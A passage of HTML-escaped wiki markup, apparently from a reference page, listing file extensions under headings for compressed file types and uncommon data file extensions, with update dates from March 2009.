.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Compressed File Types - (Update: 16 March 2009 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Uncommon Data File Extensions  (Update: 16 March 2009 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
